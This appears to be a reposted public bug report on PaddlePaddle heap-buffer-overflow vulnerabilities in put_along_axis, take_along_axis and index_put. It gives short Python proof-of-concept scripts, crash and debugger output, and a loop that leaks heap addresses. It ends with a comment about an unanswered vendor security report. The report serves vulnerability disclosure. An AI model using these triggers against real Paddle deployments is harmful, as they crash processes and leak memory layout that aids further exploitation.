bug描述 Describe the Bug

heap-buffer-overflow in function put_along_axis

Summary

The put_along_axis function will trigger a heap-buffer-overflow write under under specific circumstances.

environment

paddle:develop(Nightly build)
os:ubuntu22.04
python:Python 3.10.12 (main, Mar 22 2024, 16:50:05) [GCC 11.4.0] on linux

Vulnerability Description

There is no limit to the index value passed to the put_along_axis function, which can cause heap OOB write.

Poc

import paddle

x = paddle.to_tensor([0])
index = paddle.to_tensor([0xdeadbeef])
out = paddle.put_along_axis(
arr=x,
indices=index,
values=0xdeadbeef,
axis=0,
)

> /bin/python3 /home/hacker/Test/paddle_test/poc.py

--------------------------------------
C++ Traceback (most recent call last):
--------------------------------------
0   paddle::pybind::eager_api_put_along_axis(_object*, _object*, _object*)
1   put_along_axis_ad_func(paddle::Tensor const&, paddle::Tensor const&, paddle::Tensor const&, int, std::string)
2   paddle::experimental::put_along_axis(paddle::Tensor const&, paddle::Tensor const&, paddle::Tensor const&, int, std::string const&)
3   void phi::PutAlongAxisKernel<long, phi::CPUContext>(phi::CPUContext const&, phi::DenseTensor const&, phi::DenseTensor const&, phi::DenseTensor const&, int, std::string const&, phi::DenseTensor*)
4   void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&)

----------------------
Error Message Summary:
----------------------
FatalError: `Segmentation fault` is detected by the operating system.
  [TimeInfo: *** Aborted at 1710165968 (unix time) try "date -d @1710165968" if you are using GNU date ***]
  [SignalInfo: *** SIGSEGV (@0x6f95c6778) received by PID 13642 (TID 0x7f05e91a8740) from PID 18446744073598166904 ***]

[1]    13642 segmentation fault (core dumped)  /bin/python3 /home/hacker/Test/paddle_test/poc.py

Debug

Obviously, rcx is the value of the index we passed in, and r14 is a heap address. We can achieve heap overflow and out-of-bounds write by controlling the index .

Thread 1 "python3" received signal SIGSEGV, Segmentation fault.
0x00007ffff47f630f in void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&) () from /home/hacker/.local/lib/python3.8/site-packages/paddle/base/libpaddle.so
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────
*RAX  0x1
*RBX  0x4169000 ◂— 0xdeadbeef
*RCX  0xdeadbeef
*RDX  0x1
*RDI  0x416a000 ◂— 0xdeadbeef
*RSI  0x0
*R8   0x416a000 ◂— 0xdeadbeef
*R9   0x0
*R10  0x0
*R11  0x0
*R12  0x1
*R13  0xdeadbeef
*R14  0x416b000 ◂— 0x0
*R15  0x4169000 ◂— 0xdeadbeef
*RBP  0x7fffffffc480 —▸ 0x7fffffffc760 —▸ 0x7fffffffd050 —▸ 0x7fffffffd540 —▸ 0x7fffffffd690 ◂— ...
*RSP  0x7fffffffc1a0 —▸ 0x7fffffffc330 —▸ 0x7ffff6541d40 (vtable for phi::DenseTensor+16) —▸ 0x7fffed7fe200 (phi::DenseTensor::~DenseTensor()) ◂— push rbp
*RIP  0x7ffff47f630f (void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&)+1663) ◂— mov qword ptr [r14 + rcx*8], r13
───────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────────────────────
► 0x7ffff47f630f <void phi::funcs::cpu_scatter_assign_kernel<long, long>(...)+1663>    mov    qword ptr [r14 + rcx*8], r13
0x7ffff47f6313 <void phi::funcs::cpu_scatter_assign_kernel<long, long>(...)+1667>    cmp    rdx, rax
[......]
─────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────
[......]
───────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────
► 0   0x7ffff47f630f void phi::funcs::cpu_scatter_assign_kernel<long, long>(...)+1663
1   0x7ffff3806a3f void phi::PutAlongAxisKernel<long, phi::CPUContext>(...)+527
2   0x7fffed57cf54 paddle::experimental::put_along_axis(...)+5892
3   0x7fffeee48f5b put_along_axis_ad_func(...)+3387
4   0x7fffecafaf22 paddle::pybind::eager_api_put_along_axis(_object*, _object*, _object*)+994
5   0x7fffecd9506d
6         0x5d5499 PyCFunction_Call+89
7         0x5d6066 _PyObject_MakeTpCall+662
───────────────────────────────────────────────────────────────────────────────────────────[ THREADS (2 TOTAL) ]───────────────────────────────────────────────────────────────────────────────────────────
► 1	"python3" stopped: 0x7ffff47f630f <void phi::funcs::cpu_scatter_assign_kernel<long, long>(phi::DenseTensor, int, phi::DenseTensor const&, phi::DenseTensor, phi::DeviceContext const&)+1663> 
2	"python3" stopped: 0x7ffff7e9c23f <clock_nanosleep+223> 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

其他补充信息 Additional Supplementary Information

No response

heap-buffer-overflow read in function take_along_axis

Summary

The take_along_axis function will trigger heap-buffer-overflow under under specific circumstances.

environment

paddle:develop(Nightly build)
os:ubuntu22.04
python:Python 3.10.12 (main, Mar 22 2024, 16:50:05) [GCC 11.4.0] on linux

Vulnerability Description

There is no limit to the index value passed to the take_along_axis function, which can cause heap OOB read.

Poc

import paddle

for i in range(0x100):
    x = paddle.to_tensor([[0], [0]])
    index = paddle.to_tensor([[-i]])
    axis = 0
    result = paddle.take_along_axis(x, index, 0)
    leak_val = result[0, 0].numpy()
    print("The offset:-0x" + f"{i:x}" + "-->0x" + f"{leak_val:x}")

> python3 poc.py
The offset:-0x0-->0x0
The offset:-0x1-->0x20
The offset:-0x2-->0xfe0
The offset:-0x3-->0x0
The offset:-0x4-->0x7fcba06bcca0
The offset:-0x5-->0x0
The offset:-0x6-->0x0
The offset:-0x7-->0x7ffe0000000f
The offset:-0x8-->0x0
The offset:-0x9-->0x0
The offset:-0xa-->0x5390fc0
The offset:-0xb-->0x0
The offset:-0xc-->0xff
The offset:-0xd-->0x0
The offset:-0xe-->0x0
The offset:-0xf-->0x0
The offset:-0x10-->0x7fcb9dca97c0
[......]
The offset:-0x1d-->0x10000000f
The offset:-0x1e-->0xf00000003
[......]
The offset:-0x3a-->0x7fcb0000000a
The offset:-0x3b-->0x0
The offset:-0x3c-->0x0
The offset:-0x3d-->0x538ce28
The offset:-0x3e-->0x0
The offset:-0x3f-->0x0
The offset:-0x40-->0x5393e10
The offset:-0x41-->0x0
The offset:-0x42-->0x0
The offset:-0x43-->0x0
The offset:-0x44-->0x0
The offset:-0x45-->0xf00000001
The offset:-0x46-->0x538dde0
[......]
The offset:-0x6b-->0x7fcba2126be0
[......]
The offset:-0x72-->0x7fcb00000003
The offset:-0x73-->0x0
The offset:-0x74-->0xf00000001
The offset:-0x75-->0x7ffe00000007
[......]
The offset:-0x7c-->0x5390c30
The offset:-0x7d-->0x0
The offset:-0x7e-->0x200000008
The offset:-0x7f-->0x0
The offset:-0x80-->0x538cc10
[......]
The offset:-0xa5-->0x5396ae8
The offset:-0xa6-->0x0
The offset:-0xa7-->0x0
The offset:-0xa8-->0x0
The offset:-0xa9-->0x0
The offset:-0xaa-->0x7fcb97d23a40
The offset:-0xab-->0x0
The offset:-0xac-->0x7fcb00000005
The offset:-0xad-->0x200000008
The offset:-0xae-->0xff
The offset:-0xaf-->0x0
The offset:-0xb0-->0x0
The offset:-0xb1-->0x0
The offset:-0xb2-->0x7fcb97d23a40
The offset:-0xb3-->0x0
The offset:-0xb4-->0x7fcb9e474d30
[......]
The offset:-0xde-->0x7fcba06bda58
[......]

This easily reveals the layout of memory data and various addresses.

3条答案

按热度按时间

vddsk6oq1#

赞(0）回复(0）举报 3个月前

2sbarzqh2#

heap-buffer-overflow write in function index_put

The index_put function will trigger a heap-buffer-overflow write under under specific circumstances.

There is no limit to the indices value passed to the paddle.index_put function, which can cause heap OOB write.

import paddle

for i in range(0x100):
    x = paddle.zeros([1])
    value = paddle.ones([1])
    indices = (paddle.to_tensor([i]), paddle.to_tensor([1]))
    out = paddle.index_put(x, indices, value)

>python3 poc.py
free(): invalid next size (fast)

or:
> python3 poc.py
double free or corruption (out)

or:
> python3 poc.py
malloc(): invalid size (unsorted)

The prompt "free(): invalid next size (fast)" indicates an error reported by the glibc malloc heap manager due to memory being modified.

n53p2ov03#

顺带一提，我试过将这三份报告提交给 paddle-security@baidu.com ，但没得到回复。因此我想问，内存错误目前是否认定为漏洞？还是说是bug？

Paddle Some heap overflow reports

bug描述 Describe the Bug

heap-buffer-overflow in function put_along_axis

Summary

environment

Vulnerability Description

Poc

Debug

其他补充信息 Additional Supplementary Information

3条答案

heap-buffer-overflow read in function take_along_axis

Summary

environment

Vulnerability Description

Poc

heap-buffer-overflow write in function index_put

Summary

environment

Vulnerability Description

Poc

相关问题

热门标签

最新问答